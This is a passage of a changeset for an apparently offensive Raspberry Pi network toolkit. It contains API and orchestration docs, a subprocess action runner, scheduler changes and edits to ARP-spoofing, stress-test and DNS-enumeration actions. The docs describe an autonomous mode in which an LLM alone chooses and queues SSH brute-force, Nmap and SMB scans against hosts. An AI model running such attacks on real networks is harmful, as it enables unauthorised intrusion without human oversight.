| `zeroconf` not installed | Discovery silently disabled, DEBUG log |

---

## 14. Optional dependencies

| Package | Min version | Feature unlocked | Install command |
|---------|------------|------------------|----------------|
| `mcp[cli]` | ≥ 1.0.0 | Full MCP server | `pip install "mcp[cli]"` |
| `zeroconf` | ≥ 0.131.0 | LaRuche mDNS discovery | `pip install zeroconf` |

**No new dependencies** added for LLM backends:

- **LaRuche / Ollama**: uses `urllib.request` (Python stdlib)
- **Anthropic / OpenAI**: REST API via `urllib` - no SDK needed

---

## 15. Quick activation & configuration

### Basic LLM chat

```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
  -H "Content-Type: application/json" \
  -d '{"llm_enabled": true, "llm_backend": "ollama", "llm_ollama_model": "phi3:mini"}'
# → http://[bjorn-ip]:8000/chat.html
```

### Chat with tool-calling (LLM accesses live network data)

```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
  -d '{"llm_enabled": true, "llm_chat_tools_enabled": true}'
```

### LLM Orchestrator - advisor mode

```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
  -d '{
    "llm_enabled": true,
    "llm_orchestrator_mode": "advisor",
    "llm_orchestrator_allowed_actions": ["NmapScan", "SSHBruteforce"]
  }'
```

### LLM Orchestrator - autonomous mode (LLM as sole planner)

```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
  -d '{
    "llm_enabled": true,
    "llm_orchestrator_mode": "autonomous",
    "llm_orchestrator_skip_scheduler": true,
    "llm_orchestrator_max_actions": 5,
    "llm_orchestrator_interval_s": 120,
    "llm_orchestrator_allowed_actions": ["NmapScan", "SSHBruteforce", "SMBScan"],
    "llm_orchestrator_log_reasoning": true
  }'
# → View reasoning: http://[bjorn-ip]:8000/chat.html → Orch Log button
```

### With Anthropic API

```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
  -d '{
    "llm_enabled": true,
    "llm_backend": "api",
    "llm_api_provider": "anthropic",
    "llm_api_key": "sk-ant-...",
    "llm_api_model": "claude-haiku-4-5-20251001"
  }'
```

### With OpenRouter (access to all models)

```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
  -d '{
    "llm_enabled": true,
    "llm_backend": "api",
    "llm_api_provider": "openrouter",
    "llm_api_key": "sk-or-...",
    "llm_api_model": "meta-llama/llama-3.2-3b-instruct",
    "llm_api_base_url": "https://openrouter.ai/api"
  }'
```

### Model recommendations by scenario

| Scenario | Backend | Recommended model | Pi RAM |
|----------|---------|-------------------|--------|
| Autonomous orchestrator + LaRuche on LAN | laruche | Mistral/Phi on the node | 0 (remote inference) |
| Autonomous orchestrator offline | ollama | `qwen2.5:3b` | ~3 GB |
| Autonomous orchestrator cloud | api | `claude-haiku-4-5-20251001` | 0 |
| Chat + tools | ollama | `phi3:mini` | ~2 GB |
| EPD comments only | ollama | `smollm2:360m` | ~400 MB |

---

## 16. Complete API endpoint reference

### GET

```
GET /api/llm/status
→ {"enabled": bool, "backend": str, "laruche_url": str|null,
   "laruche_discovery": bool, "ollama_url": str, "ollama_model": str,
   "api_provider": str, "api_model": str, "api_key_set": bool}

GET /api/llm/config
→ {all llm_* keys except api_key, + "llm_api_key_set": bool}

GET /api/llm/reasoning
→ {"status": "ok", "messages": [{"role": str, "content": str}, ...], "count": int}
→ {"status": "error", "message": str, "messages": [], "count": 0}

GET /api/mcp/status
→ {"enabled": bool, "running": bool, "transport": str,
   "port": int, "allowed_tools": [str]}
```
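
For instance, a quick status check from any machine on the LAN (stdlib only; the IP below is a placeholder for your device's address, and if `webauth` is enabled the request also needs credentials):

```python
import json
import urllib.request

# Hypothetical address; substitute your Bjorn's IP
with urllib.request.urlopen("http://192.168.1.50:8000/api/llm/status", timeout=5) as resp:
    status = json.load(resp)

print(status["enabled"], status["backend"])  # e.g. True auto
```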

### POST

```
POST /api/llm/chat
Body: {"message": str, "session_id": str?}
→ {"status": "ok", "response": str, "session_id": str}
→ {"status": "error", "message": str}

POST /api/llm/clear_history
Body: {"session_id": str?}
→ {"status": "ok"}

POST /api/llm/config
Body: {any subset of llm_* and llm_orchestrator_* keys}
→ {"status": "ok"}
→ {"status": "error", "message": str}

POST /api/mcp/toggle
Body: {"enabled": bool}
→ {"status": "ok", "enabled": bool, "started": bool?}

POST /api/mcp/config
Body: {"allowed_tools": [str]?, "port": int?, "transport": str?}
→ {"status": "ok", "config": {...}}
```

---

## 17. Queue priority system

```
Priority   Source            Trigger
──────────────────────────────────────────────────────────────
85         LLM Advisor       llm_orchestrator.advise()
82         LLM Autonomous    _run_autonomous_cycle() via run_action tool
80         External MCP      _impl_run_action() via MCP client or chat
50         Normal / manual   queue_action() without explicit priority
40         Scheduler         action_scheduler evaluates triggers
```

The scheduler always processes the highest-priority pending item first. LLM and MCP actions therefore preempt scheduler actions.
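
Conceptually the dequeue is a priority-first ordering. A sketch using the `db.query_one` helper seen elsewhere in this changeset (the `created_at` tiebreaker column is an assumption):

```python
# Highest priority first; oldest first among equals (created_at is assumed)
row = shared_data.db.query_one(
    "SELECT * FROM action_queue "
    "WHERE status = 'pending' "
    "ORDER BY priority DESC, created_at ASC "
    "LIMIT 1"
)
```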

---

## 18. Fallbacks & graceful degradation

| Condition | Behaviour |
|-----------|-----------|
| `llm_enabled = False` | `complete()` returns `None` immediately - zero overhead |
| `llm_orchestrator_mode = "none"` | LLMOrchestrator not instantiated |
| `mcp` not installed | `_build_mcp_server()` returns `None`, WARNING log |
| `zeroconf` not installed | LaRuche discovery silently disabled, DEBUG log |
| LaRuche node timeout | Exception caught, cascade to next backend |
| Ollama not running | `URLError` caught, cascade to API |
| API key missing | `_call_api()` returns `None`, cascade |
| All backends fail | `complete()` returns `None` |
| LLM returns `None` for EPD | `comment.py` uses `_pick_text()` (original behaviour) |
| LLM advisor: invalid JSON | DEBUG log, returns `None`, next cycle |
| LLM advisor: disallowed action | WARNING log, ignored |
| LLM autonomous: no change | cycle skipped, zero API call |
| LLM autonomous: ≥6 tool turns | returns partial text + warning |
| Exception in LLM Bridge | `try/except` at every level, DEBUG log |
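
The cascade rows amount to a try-each-backend loop inside `complete()`; sketched below with hypothetical per-backend method names (only `_call_api` and `_call_anthropic` are confirmed by this document):

```python
def complete(self, messages, system=None, tools=None):
    """Try each available backend in priority order; None if all fail."""
    if not self.shared_data.config.get("llm_enabled", False):
        return None                      # disabled: zero overhead
    for backend in (self._call_laruche, self._call_ollama, self._call_api):
        try:
            text = backend(messages, system=system, tools=tools)
            if text is not None:
                return text              # first successful backend wins
        except Exception:
            continue                     # timeout / URLError / etc.: cascade
    return None                          # all backends failed
```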

### Timeouts

```
Chat / complete()  → llm_timeout_s (default: 30s)
EPD comments       → 8s  (hardcoded, short to avoid blocking render)
Autonomous cycle   → 90s (long: may chain multiple tool calls)
Advisor            → 20s (short prompt + JSON response)
```

---

## 19. Call sequences

### Web chat with tool-calling

```
Browser → POST /api/llm/chat {"message": "which hosts are vulnerable?"}
└── LLMUtils.handle_chat(data)
    └── LLMBridge().chat(message, session_id)
        └── complete(messages, system, tools=_BJORN_TOOLS)
            └── _call_anthropic(messages, tools=[...])
                ├── POST /v1/messages → stop_reason=tool_use
                │   └── tool: get_hosts(alive_only=true)
                │       → _execute_tool → _impl_get_hosts()
                │       → JSON of hosts
                ├── POST /v1/messages [+ tool result] → end_turn
                └── returns "3 exposed SSH hosts: 192.168.1.10, ..."
← {"status": "ok", "response": "3 exposed SSH hosts..."}
```

### LLM autonomous cycle

```
Thread "LLMOrchestrator" (daemon, interval=60s)
└── _run_autonomous_cycle()
    ├── fp = _compute_fingerprint() → (12, 3, 1, 47)
    ├── _has_actionable_change(fp) → True (vuln_count 2→3)
    ├── self._last_fingerprint = fp
    │
    └── LLMBridge().complete(prompt, system, tools=[read-only + run_action])
        └── _call_anthropic(tools=[...])
            ├── POST → tool_use: get_hosts()
            │   → [{ip: "192.168.1.20", ports: "22,80,443"}]
            ├── POST → tool_use: get_action_history()
            │   → [...]
            ├── POST → tool_use: run_action("SSHBruteforce", "192.168.1.20")
            │   → _execute_tool → _impl_run_action()
            │   → db.queue_action(priority=82, trigger="llm_autonomous")
            │   → queue_event.set()
            └── POST → end_turn
                → "Queued SSHBruteforce on 192.168.1.20 (Mjolnir strikes the unguarded gate)"
→ [if log_reasoning=True] logger.info("[LLM_ORCH_REASONING]...")
→ [if log_reasoning=True] _push_to_chat(bridge, prompt, response)
```
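
The fingerprint gate at the top of that trace is deliberately cheap. A sketch of the two helpers (the `(hosts, vulns, creds, pending)` composition is inferred from the example tuple above; the `vulnerabilities` table name is an assumption):

```python
def _compute_fingerprint(self) -> tuple:
    """Tiny tuple of DB counts; any change means 'something actionable happened'."""
    def count(sql: str) -> int:
        try:
            row = self.shared_data.db.query_one(sql)
            return int(row["c"]) if row else 0
        except Exception:
            return 0

    return (
        count("SELECT COUNT(*) AS c FROM hosts"),
        count("SELECT COUNT(*) AS c FROM vulnerabilities"),   # table name assumed
        count("SELECT COUNT(*) AS c FROM creds"),
        count("SELECT COUNT(*) AS c FROM action_queue WHERE status = 'pending'"),
    )

def _has_actionable_change(self, fp: tuple) -> bool:
    return fp != self._last_fingerprint
```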

### Reading reasoning from chat.html

```
User clicks "Orch Log"
└── fetch GET /api/llm/reasoning
    └── LLMUtils.get_llm_reasoning(handler)
        └── LLMBridge()._chat_histories["llm_orchestrator"]
            → [{"role": "user", "content": "[Autonomous cycle]..."},
               {"role": "assistant", "content": "Queued SSHBruteforce..."}]
← {"status": "ok", "messages": [...], "count": 2}
→ Rendered as chat bubbles in #messages
```

### MCP from external client (Claude Desktop)

```
Claude Desktop → tool_call: run_action("NmapScan", "192.168.1.0/24")
└── FastMCP dispatch
    └── mcp_server.run_action(action_name, target_ip)
        └── _impl_run_action()
            ├── db.queue_action(priority=80, trigger="mcp")
            └── queue_event.set()
← {"status": "queued", "action": "NmapScan", "target": "192.168.1.0/24", "priority": 80}
```

### EPD comment with LLM

```
display.py → CommentAI.get_comment("SSHBruteforce", params={...})
└── delay elapsed OR status changed → proceed
    ├── llm_comments_enabled = True ?
    │   └── LLMBridge().generate_comment("SSHBruteforce", params)
    │       └── complete([{role:user, content:"Status: SSHBruteforce..."}],
    │                    max_tokens=80, timeout=8)
    │           ├── LaRuche → "Norse gods smell SSH credentials..." ✓
    │           └── [or timeout 8s] → None
    └── text = None → _pick_text("SSHBruteforce", lang, params)
        └── SELECT FROM comments WHERE status='SSHBruteforce'
            → "Processing authentication attempts..."
```

action_runner.py (new file, 121 lines)

@@ -0,0 +1,121 @@
"""action_runner.py - Generic subprocess wrapper for running Bjorn actions from the web UI."""

import sys
import os
import signal
import importlib
import argparse
import traceback


def _inject_extra_args(shared_data, remaining):
    """Parse leftover --key value pairs and set them as shared_data attributes."""
    i = 0
    while i < len(remaining):
        token = remaining[i]
        if token.startswith("--"):
            key = token[2:].replace("-", "_")
            if i + 1 < len(remaining) and not remaining[i + 1].startswith("--"):
                val = remaining[i + 1]
                # Auto-cast numeric values
                try:
                    val = int(val)
                except ValueError:
                    try:
                        val = float(val)
                    except ValueError:
                        pass
                setattr(shared_data, key, val)
                i += 2
            else:
                setattr(shared_data, key, True)
                i += 1
        else:
            i += 1
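

# Example (hypothetical flags): `python action_runner.py ssh_bruteforce SSHBruteforce --ip 10.0.0.5 --rate 20 --deep-scan`
# leaves --rate/--deep-scan in `remaining`, so this helper sets
# shared_data.rate = 20 (int-cast) and shared_data.deep_scan = True (bare flag).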


def main():
    parser = argparse.ArgumentParser(
        description="Bjorn Action Runner - bootstraps shared_data and calls action.execute()"
    )
    parser.add_argument("b_module", help="Action module name (e.g. ssh_bruteforce)")
    parser.add_argument("b_class", help="Action class name (e.g. SSHBruteforce)")
    parser.add_argument("--ip", default="", help="Target IP address")
    parser.add_argument("--port", default="", help="Target port")
    parser.add_argument("--mac", default="", help="Target MAC address")

    args, remaining = parser.parse_known_args()

    # Bootstrap shared_data (creates fresh DB conn, loads config)
    print(f"[runner] Loading shared_data for {args.b_class}...")
    from init_shared import shared_data

    # Graceful shutdown on SIGTERM (user clicks Stop in the UI)
    def _sigterm(signum, frame):
        print("[runner] SIGTERM received, requesting graceful stop...")
        shared_data.orchestrator_should_exit = True

    signal.signal(signal.SIGTERM, _sigterm)

    # Inject extra CLI flags as shared_data attributes
    # e.g. --berserker-mode tcp -> shared_data.berserker_mode = "tcp"
    _inject_extra_args(shared_data, remaining)

    # Dynamic import (custom/ paths use dots: actions.custom.my_script)
    module_path = f"actions.{args.b_module.replace('/', '.')}"
    print(f"[runner] Importing {module_path}...")
    module = importlib.import_module(module_path)
    action_class = getattr(module, args.b_class)

    # Instantiate with shared_data (same as orchestrator)
    action_instance = action_class(shared_data)

    # Resolve MAC from DB if not provided
    mac = args.mac
    if not mac and args.ip:
        try:
            rows = shared_data.db.query(
                "SELECT \"MAC Address\" FROM hosts WHERE IPs = ? LIMIT 1",
                (args.ip,)
            )
            if rows:
                mac = rows[0].get("MAC Address", "") or ""
        except Exception:
            mac = ""

    # Build row dict (matches orchestrator.py:609-614)
    ip = args.ip or ""
    port = args.port or ""
    row = {
        "MAC Address": mac or "",
        "IPs": ip,
        "Ports": port,
        "Alive": 1,
    }

    # Execute
    print(f"[runner] Executing {args.b_class} on {ip or 'global'}:{port}...")

    if hasattr(action_instance, "scan") and not ip:
        # Global action (e.g. NetworkScanner)
        action_instance.scan()
        result = "success"
    else:
        if not ip:
            print(f"[runner] ERROR: {args.b_class} requires --ip but none provided")
            sys.exit(1)
        result = action_instance.execute(ip, port, row, args.b_class)

    print(f"[runner] Finished with result: {result}")
    sys.exit(0 if result == "success" else 1)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n[runner] Interrupted")
        sys.exit(130)
    except Exception:
        traceback.print_exc()
        sys.exit(2)
@@ -1,18 +1,4 @@
-# action_scheduler.py testsdd
-# Smart Action Scheduler for Bjorn - queue-only implementation
-# Handles trigger evaluation, requirements checking, and queue management.
-#
-# Invariants we enforce:
-# - At most ONE "active" row per (action_name, mac_address, COALESCE(port,0))
-#   where active ∈ {'scheduled','pending','running'}.
-# - Retries for failed entries are coordinated by cleanup_queue() (with backoff)
-#   and never compete with trigger-based enqueues.
-#
-# Runtime knobs (from shared.py):
-#   shared_data.retry_success_actions : bool (default False)
-#   shared_data.retry_failed_actions  : bool (default True)
-#
-# These take precedence over cooldown / rate-limit for NON-interval triggers.
+"""action_scheduler.py - Trigger evaluation, queue management, and dedup for scheduled actions."""
 
 from __future__ import annotations
 

@@ -82,6 +68,9 @@ class ActionScheduler:
         self._last_cache_refresh = 0.0
         self._cache_ttl = 60.0  # seconds
 
+        # Lock for global action evaluation (must be created here, not lazily)
+        self._globals_lock = threading.Lock()
+
         # Memory for global actions
         self._last_global_runs: Dict[str, float] = {}
         # Actions Studio last source type

@@ -133,19 +122,44 @@ class ActionScheduler:
         # Keep queue consistent with current enable/disable flags.
         self._cancel_queued_disabled_actions()
 
-        # 1) Promote scheduled actions that are due
+        # 1) Promote scheduled actions that are due (always - queue hygiene)
         self._promote_scheduled_to_pending()
 
-        # 2) Publish next scheduled occurrences for interval actions
-        self._publish_all_upcoming()
+        # When LLM autonomous mode owns scheduling, skip trigger evaluation
+        # so it doesn't compete with or duplicate LLM decisions.
+        # BUT: if the queue is empty, the heuristic scheduler resumes as fallback
+        # to prevent deadlock when the LLM fails to produce valid actions.
+        _llm_wants_skip = bool(
+            self.shared_data.config.get("llm_orchestrator_skip_scheduler", False)
+            and self.shared_data.config.get("llm_orchestrator_mode") == "autonomous"
+            and self.shared_data.config.get("llm_enabled", False)
+        )
+        _queue_empty = False
+        if _llm_wants_skip:
+            try:
+                row = self.shared_data.db.query_one(
+                    "SELECT COUNT(*) AS cnt FROM action_queue WHERE status IN ('pending','running','scheduled')"
+                )
+                _queue_empty = (row and int(row["cnt"]) == 0)
+            except Exception:
+                pass
+        _llm_skip = _llm_wants_skip and not _queue_empty
 
-        # 3) Evaluate global on_start actions
-        self._evaluate_global_actions()
+        if not _llm_skip:
+            if _llm_wants_skip and _queue_empty:
+                logger.info("Scheduler: LLM queue empty - heuristic fallback active")
+            # 2) Publish next scheduled occurrences for interval actions
+            self._publish_all_upcoming()
 
-        # 4) Evaluate per-host triggers
-        self.evaluate_all_triggers()
+            # 3) Evaluate global on_start actions
+            self._evaluate_global_actions()
 
-        # 5) Queue maintenance
+            # 4) Evaluate per-host triggers
+            self.evaluate_all_triggers()
+        else:
+            logger.debug("Scheduler: trigger evaluation skipped (LLM autonomous owns scheduling)")
 
+        # 5) Queue maintenance (always - starvation prevention + cleanup)
         self.cleanup_queue()
         self.update_priorities()

@@ -743,8 +757,6 @@ class ActionScheduler:
 
     def _evaluate_global_actions(self):
         """Evaluate and queue global actions with on_start trigger."""
-        self._globals_lock = getattr(self, "_globals_lock", threading.Lock())
-
         with self._globals_lock:
             try:
                 for action in self._action_definitions.values():
@@ -1,14 +1,34 @@
"""IDLE.py - No-op placeholder action for idle state."""

from shared import SharedData

b_class = "IDLE"
b_module = "idle"
b_status = "IDLE"
b_enabled = 0
b_action = "normal"
b_trigger = None
b_port = None
b_service = "[]"
b_priority = 0
b_timeout = 60
b_cooldown = 0
b_name = "IDLE"
b_description = "No-op placeholder action representing idle state."
b_author = "Bjorn Team"
b_version = "1.0.0"
b_max_retries = 0
b_stealth_level = 10
b_risk_level = "low"
b_tags = ["idle", "placeholder"]
b_category = "system"
b_icon = "IDLE.png"


class IDLE:
    def __init__(self, shared_data):
        self.shared_data = shared_data

    def execute(self, ip, port, row, status_key) -> str:
        """No-op action. Always returns success."""
        return "success"
@@ -1,15 +1,6 @@
-"""
-arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
-
+"""arp_spoofer.py - Bidirectional ARP cache poisoning for MITM positioning.
 Ethical cybersecurity lab action for Bjorn framework.
 Performs bidirectional ARP spoofing between a target host and the network
 gateway. Restores ARP tables on completion or interruption.
-
-SQL mode:
-- Orchestrator provides (ip, port, row) for the target host.
-- Gateway IP is auto-detected from system routing table or shared config.
-- Results persisted to JSON output and logged for RL training.
-- Fully integrated with EPD display (progress, status, comments).
+Spoofs target<->gateway ARP entries; auto-restores tables on exit.
 """
 
 import os

@@ -104,7 +95,7 @@ class ARPSpoof:
             from scapy.all import ARP, Ether, sendp, sr1  # noqa: F401
             self._scapy_ok = True
         except ImportError:
-            logger.error("scapy not available — ARPSpoof will not function")
+            logger.error("scapy not available - ARPSpoof will not function")
             self._scapy_ok = False
 
     # ─────────────────── Identity Cache ──────────────────────

@@ -231,7 +222,7 @@ class ARPSpoof:
             logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
             return "failed"
         if gateway_ip == ip:
-            logger.warning(f"Target {ip} IS the gateway — skipping")
+            logger.warning(f"Target {ip} IS the gateway - skipping")
             return "failed"
 
         logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")

@@ -252,7 +243,7 @@ class ARPSpoof:
             return "failed"
 
         self.shared_data.bjorn_progress = "20%"
-        logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
+        logger.info(f"Resolved - target_mac={target_mac}, gateway_mac={gateway_mac}")
         self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
 
         # 3) Spoofing loop

@@ -263,7 +254,7 @@ class ARPSpoof:
 
         while (time.time() - start_time) < duration:
             if self.shared_data.orchestrator_should_exit:
-                logger.info("Orchestrator exit — stopping ARP spoof")
+                logger.info("Orchestrator exit - stopping ARP spoof")
                 break
             self._send_arp_poison(ip, target_mac, gateway_ip, iface)
             self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
@@ -1,19 +1,8 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-"""
-berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
+"""berserker_force.py - Rate-limited service stress testing with degradation analysis.
 
-What it does:
-- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
-- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
-  (scapy), HTTP probes (urllib), or mixed mode.
-- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
-- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
-
 This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
 target's response times change under light load. Max 50 req/s to stay RPi-safe.
 
-Output is saved to data/output/stress/<ip>_<timestamp>.json
+Measures baseline response times, applies light load (max 50 req/s), then reports per-port degradation.
 """
 
 import json

@@ -115,8 +104,8 @@ b_examples = [
 b_docs_url = "docs/actions/BerserkerForce.md"
 
 # -------------------- Constants -----------------------------------------------
-_DATA_DIR = "/home/bjorn/Bjorn/data"
-OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
+_DATA_DIR = None    # Resolved at runtime via shared_data.data_dir
+OUTPUT_DIR = None   # Resolved at runtime via shared_data.data_dir
 
 _BASELINE_SAMPLES = 3     # TCP connect samples per port for baseline
 _CONNECT_TIMEOUT_S = 2.0  # socket connect timeout

@@ -428,15 +417,16 @@ class BerserkerForce:
 
     def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
         """Write the JSON report and return the file path."""
+        output_dir = os.path.join(self.shared_data.data_dir, "output", "stress")
         try:
-            os.makedirs(OUTPUT_DIR, exist_ok=True)
+            os.makedirs(output_dir, exist_ok=True)
         except Exception as exc:
-            logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
+            logger.warning(f"Could not create output dir {output_dir}: {exc}")
 
         ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
         safe_ip = ip.replace(":", "_").replace(".", "_")
         filename = f"{safe_ip}_{ts}.json"
-        filepath = os.path.join(OUTPUT_DIR, filename)
+        filepath = os.path.join(output_dir, filename)
 
         report = {
             "tool": "berserker_force",
@@ -1,3 +1,5 @@
+"""bruteforce_common.py - Shared helpers for all bruteforce actions (progress tracking, password generation)."""
+
 import itertools
 import threading
 import time

actions/custom/__init__.py (new file, 0 lines)

actions/custom/example_bjorn_action.py (new file, 105 lines)
@@ -0,0 +1,105 @@
"""example_bjorn_action.py - Custom action template using the Bjorn action format."""

import time
import logging
from logger import Logger

logger = Logger(name="example_bjorn_action", level=logging.DEBUG)

# ---- Bjorn action metadata (required for Bjorn format detection) ----
b_class = "ExampleBjornAction"
b_module = "custom/example_bjorn_action"
b_name = "Example Bjorn Action"
b_description = "Demo custom action with shared_data access and DB queries."
b_author = "Bjorn Community"
b_version = "1.0.0"
b_action = "custom"
b_enabled = 1
b_priority = 50
b_port = None
b_service = None
b_trigger = None
b_parent = None
b_cooldown = 0
b_rate_limit = None
b_tags = '["custom", "example", "template"]'

# ---- Argument schema (drives the web UI controls) ----
b_args = {
    "target_ip": {
        "type": "text",
        "default": "192.168.1.1",
        "description": "Target IP address to probe"
    },
    "scan_count": {
        "type": "number",
        "default": 3,
        "min": 1,
        "max": 100,
        "description": "Number of probe iterations"
    },
    "verbose": {
        "type": "checkbox",
        "default": False,
        "description": "Enable verbose output"
    },
    "mode": {
        "type": "select",
        "choices": ["quick", "normal", "deep"],
        "default": "normal",
        "description": "Scan depth"
    }
}

b_examples = [
    {"name": "Quick local scan", "args": {"target_ip": "192.168.1.1", "scan_count": 1, "mode": "quick"}},
    {"name": "Deep scan", "args": {"target_ip": "10.0.0.1", "scan_count": 10, "mode": "deep", "verbose": True}},
]


class ExampleBjornAction:
    """Custom Bjorn action with full shared_data access."""

    def __init__(self, shared_data):
        self.shared_data = shared_data
        logger.info("ExampleBjornAction initialized")

    def execute(self, ip, port, row, status_key):
        """Main entry point called by action_runner / orchestrator.

        Args:
            ip: Target IP address
            port: Target port (may be empty)
            row: Dict with MAC Address, IPs, Ports, Alive
            status_key: Action class name (for status tracking)

        Returns:
            'success' or 'failed'
        """
        verbose = getattr(self.shared_data, "verbose", False)
        scan_count = int(getattr(self.shared_data, "scan_count", 3))
        mode = getattr(self.shared_data, "mode", "normal")

        print(f"[*] Running ExampleBjornAction on {ip} (mode={mode}, count={scan_count})")

        # Example: query DB for known hosts
        try:
            host_count = self.shared_data.db.query_one(
                "SELECT COUNT(1) c FROM hosts"
            )
            print(f"[*] Known hosts in DB: {host_count['c'] if host_count else 0}")
        except Exception as e:
            print(f"[!] DB query failed: {e}")

        # Simulate work
        for i in range(scan_count):
            if getattr(self.shared_data, "orchestrator_should_exit", False):
                print("[!] Stop requested, aborting")
                return "failed"
            print(f"[*] Probe {i+1}/{scan_count} on {ip}...")
            if verbose:
                print(f"    MAC={row.get('MAC Address', 'unknown')} mode={mode}")
            time.sleep(1)

        print(f"[+] Done. {scan_count} probes completed on {ip}")
        return "success"
actions/custom/example_free_script.py (new file, 97 lines)

@@ -0,0 +1,97 @@
"""example_free_script.py - Custom script template using plain Python (no shared_data)."""

import argparse
import time
import sys

# ---- Display metadata (optional, used by the web UI) ----
b_name = "Example Free Script"
b_description = "Standalone Python script demo with argparse and progress output."
b_author = "Bjorn Community"
b_version = "1.0.0"
b_tags = '["custom", "example", "template", "free"]'

# ---- Argument schema (drives the web UI controls, same format as Bjorn actions) ----
b_args = {
    "target": {
        "type": "text",
        "default": "192.168.1.0/24",
        "description": "Target host or CIDR range"
    },
    "timeout": {
        "type": "number",
        "default": 5,
        "min": 1,
        "max": 60,
        "description": "Timeout per probe in seconds"
    },
    "output_format": {
        "type": "select",
        "choices": ["text", "json", "csv"],
        "default": "text",
        "description": "Output format"
    },
    "dry_run": {
        "type": "checkbox",
        "default": False,
        "description": "Simulate without actually probing"
    }
}

b_examples = [
    {"name": "Quick local check", "args": {"target": "192.168.1.1", "timeout": 2, "output_format": "text"}},
    {"name": "Dry run JSON", "args": {"target": "10.0.0.0/24", "timeout": 5, "output_format": "json", "dry_run": True}},
]


def main():
    parser = argparse.ArgumentParser(description="Example free-form Bjorn custom script")
    parser.add_argument("--target", default="192.168.1.0/24", help="Target host or CIDR")
    parser.add_argument("--timeout", type=int, default=5, help="Timeout per probe (seconds)")
    parser.add_argument("--output-format", default="text", choices=["text", "json", "csv"])
    parser.add_argument("--dry-run", action="store_true", help="Simulate without probing")
    args = parser.parse_args()

    print("[*] Example Free Script starting")
    print(f"[*] Target: {args.target}")
    print(f"[*] Timeout: {args.timeout}s")
    print(f"[*] Format: {args.output_format}")
    print(f"[*] Dry run: {args.dry_run}")
    print()

    # Simulate some work with progress output
    steps = 5
    for i in range(steps):
        print(f"[*] Step {i+1}/{steps}: {'simulating' if args.dry_run else 'probing'} {args.target}...")
        time.sleep(1)

    # Example output in different formats
    results = [
        {"host": "192.168.1.1", "status": "up", "latency": "2ms"},
        {"host": "192.168.1.100", "status": "up", "latency": "5ms"},
    ]

    if args.output_format == "json":
        import json
        print(json.dumps(results, indent=2))
    elif args.output_format == "csv":
        print("host,status,latency")
        for r in results:
            print(f"{r['host']},{r['status']},{r['latency']}")
    else:
        for r in results:
            print(f"  {r['host']}  {r['status']}  ({r['latency']})")

    print()
    print(f"[+] Done. Found {len(results)} hosts.")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n[!] Interrupted")
        sys.exit(130)
    except Exception as e:
        print(f"\n[!] Error: {e}")
        sys.exit(1)
@@ -1,9 +1,5 @@
-# demo_action.py
-# Demonstration Action: wrapped in a DemoAction class
+"""demo_action.py - Minimal template action that prints its arguments."""
 
-# ---------------------------------------------------------------------------
-# Metadata (compatible with sync_actions / Neo launcher)
-# ---------------------------------------------------------------------------
 b_class = "DemoAction"
 b_module = "demo_action"
 b_enabled = 1

@@ -14,6 +10,19 @@ b_description = "Demonstration action: simply prints the received arguments."
 b_author = "Template"
 b_version = "0.1.0"
 b_icon = "demo_action.png"
+b_status = "demo_action"
+b_port = None
+b_service = "[]"
+b_trigger = None
+b_parent = None
+b_priority = 0
+b_cooldown = 0
+b_rate_limit = None
+b_timeout = 60
+b_max_retries = 0
+b_stealth_level = 10
+b_risk_level = "low"
+b_tags = ["demo", "template", "test"]
 
 b_examples = [
     {

@@ -129,6 +138,8 @@ def _list_net_ifaces() -> list[str]:
         names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
     except Exception:
         pass
+    if os.name == "nt":
+        return ["Ethernet", "Wi-Fi"]
    try:
        for n in os.listdir("/sys/class/net"):
            if n and n != "lo":

@@ -183,7 +194,8 @@ class DemoAction:
     def execute(self, ip=None, port=None, row=None, status_key=None):
         """Called by the orchestrator. This demo only prints arguments."""
         self.shared_data.bjorn_orch_status = "DemoAction"
-        self.shared_data.comment_params = {"ip": ip, "port": port}
+        # EPD live status
+        self.shared_data.comment_params = {"status": "running"}
 
         print("=== DemoAction :: executed ===")
         print(f"  IP/Target: {ip}:{port}")

@@ -1,19 +1,4 @@
-"""
-dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
-
-Performs comprehensive DNS intelligence gathering on discovered hosts:
-- Reverse DNS lookup on target IP
-- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
-- Zone transfer (AXFR) attempts against discovered nameservers
-- Subdomain brute-force enumeration with threading
-
-SQL mode:
-- Targets provided by the orchestrator (ip + port)
-- IP -> (MAC, hostname) mapping read from DB 'hosts'
-- Discovered hostnames are written back to DB hosts table
-- Results saved as JSON in data/output/dns/
-- Action status recorded in DB.action_results (via DNSPillager.execute)
-"""
+"""dns_pillager.py - DNS recon: reverse lookups, record enumeration, zone transfers, subdomain brute."""
 
 import os
 import json

@@ -29,7 +14,6 @@ from concurrent.futures import ThreadPoolExecutor, as_completed
 from shared import SharedData
 from logger import Logger
 
-# Configure the logger
 logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
 
 # ---------------------------------------------------------------------------
@@ -48,12 +48,12 @@ b_args = {
